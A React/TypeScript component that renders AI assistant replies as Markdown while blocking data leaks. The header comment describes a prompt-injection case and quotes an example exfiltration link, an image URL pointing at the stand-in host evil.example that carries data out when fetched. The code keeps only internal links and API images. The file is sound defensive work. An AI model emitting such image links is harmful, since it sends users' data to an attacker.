/**
 * Markdown for assistant replies.
 *
 * The model writes them after reading text other people wrote (profiles,
 * messages, CVs), so a reply can carry a prompt injection's payload. The
 * classic one is `![](https://evil.example/?d=<the data>)`: the browser fetches
 * the image and the data leaves with the request. So this shows an image only
 * when our own API serves it, keeps a link only when it points inside Artemis
 * (and then navigates in the app), and shows every other link as its plain text. Raw HTML is not
 * rendered either (no rehype-raw). Deliberately not MarkdownDocContent, which
 * renders images, opens external links and draws mermaid fences.
 */
import Box from "@mui/material/Box";
import Link from "@mui/material/Link";
import ReactMarkdown, { type Components } from "react-markdown";
import { Link as RouterLink } from "react-router-dom";
import remarkGfm from "remark-gfm";
import { MARKDOWN_TABLE_SCROLLER } from "../common/markdown-table-scroller";
import MarkdownDocImage from "../docs/markdown-doc-image";

/** "/todo?tab=roles" is inside Artemis; "//host", "/\host" and any scheme are not. */
export const isInternalPath = (url: string): boolean => /^\/(?![/\\])/.test(url);

/** An image the reply may show: one served by our own API. */
const isInternalApiPath = (url: string): boolean => url.startsWith("/api/");

const COMPONENTS: Components = {
	...MARKDOWN_TABLE_SCROLLER,
	// Only our own API's pictures, fetched as the user (a bare <img> would
	// carry no login). External sources were already dropped by internalOnly.
	img({ src, alt }) {
		return typeof src === "string" && isInternalApiPath(src) ? (
			<MarkdownDocImage src={src} alt={alt ?? ""} />
		) : null;
	},
	a({ href, children }) {
		if (href && isInternalPath(href)) {
			return (
				<Link
					component={RouterLink}
					to={href}
					data-component="assistant-internal-link"
				>
					{children}
				</Link>
			);
		}
		return <>{children}</>;
	},
};

/** Drops every URL that is not an internal path before any element sees it. */
const internalOnly = (url: string): string | undefined =>
	isInternalPath(url) ? url : undefined;

export const AssistantMarkdown = ({ content }: { content: string }) => (
	<Box
		data-component="assistant-markdown"
		sx={{
			typography: "body2",
			"& > *:first-of-type": { mt: 0 },
			"& > *:last-child": { mb: 0 },
			"& p, & ul, & ol": { my: 1 },
			"& h1, & h2, & h3": { fontSize: "0.9375rem", mt: 1.5, mb: 0.5 },
		}}
	>
		<ReactMarkdown
			remarkPlugins={[remarkGfm]}
			components={COMPONENTS}
			urlTransform={internalOnly}
		>
			{content}
		</ReactMarkdown>
	</Box>
);
